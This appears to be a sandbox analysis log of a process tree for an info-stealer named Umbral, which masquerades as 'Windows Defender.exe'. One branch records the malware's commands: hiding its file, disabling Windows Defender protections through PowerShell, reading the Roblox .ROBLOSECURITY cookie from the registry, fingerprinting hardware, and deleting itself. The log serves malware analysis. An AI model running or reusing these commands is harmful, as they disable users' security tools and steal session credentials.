        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        264⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        264⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        263⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        263⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        262⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        262⤵
        
        PID:1304
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        261⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        261⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        260⤵
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        260⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        259⤵
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        259⤵
        
        PID:1916
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        258⤵
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        258⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        257⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        257⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        256⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        256⤵
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        255⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        255⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        254⤵
        
        PID:5092
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        254⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        253⤵
        
        PID:744
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        253⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        252⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        252⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        251⤵
        
        PID:312
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        251⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        250⤵
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        250⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        249⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        249⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        248⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        248⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        247⤵
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        247⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        246⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        246⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        245⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        245⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        244⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        244⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        243⤵
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        243⤵
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        242⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        242⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        241⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        241⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        240⤵
        
        PID:3248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        241⤵
        
        PID:2448
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        241⤵
        Views/modifies file attributes
        
        PID:392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        241⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        241⤵
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        241⤵
        
        PID:4860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        241⤵
        
        PID:5028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        241⤵
        
        PID:1612
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        241⤵
        
        PID:3172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        241⤵
        
        PID:2248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        241⤵
        
        PID:3256
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        241⤵
        Detects videocard installed
        
        PID:1244
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        241⤵
        
        PID:5016
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        242⤵
        Runs ping.exe
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        240⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        239⤵
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        239⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        238⤵
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        238⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        237⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        237⤵
        
        PID:3572
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        236⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        236⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        235⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        235⤵
        
        PID:3288
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        234⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        234⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        233⤵
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        233⤵
        
        PID:312
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        232⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        232⤵
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        231⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        231⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        230⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        230⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        229⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        229⤵
        
        PID:1292
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        228⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        228⤵
        
        PID:2112
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        227⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        227⤵
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        226⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        226⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        225⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        225⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        224⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        224⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        223⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        223⤵
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        222⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        222⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        221⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        221⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        220⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        220⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        219⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        219⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        218⤵
        
        PID:3432
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        218⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        217⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        217⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        216⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        216⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        215⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        215⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        214⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        214⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        213⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        213⤵
        
        PID:824
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        212⤵
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        212⤵
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        211⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        211⤵
        
        PID:2580
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        210⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        210⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        209⤵
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        209⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        208⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        208⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        207⤵
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        207⤵
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        206⤵
        
        PID:3076
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        206⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        205⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        205⤵
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        204⤵
        
        PID:312
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        204⤵
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        203⤵
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        203⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        202⤵
        
        PID:4452
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        202⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        201⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        201⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        200⤵
        
        PID:2304
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        200⤵
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        199⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        199⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        198⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        198⤵
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        197⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        197⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        196⤵
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        196⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        195⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        195⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        194⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        194⤵
        
        PID:1828
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        193⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        193⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        192⤵
        
        PID:3604
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        192⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        191⤵
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        191⤵
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        190⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        190⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        189⤵
        
        PID:464
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        189⤵
        
        PID:596
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        188⤵
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        188⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        187⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        187⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        186⤵
        
        PID:312
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        186⤵
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        185⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        185⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        184⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        184⤵
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        183⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        183⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        182⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
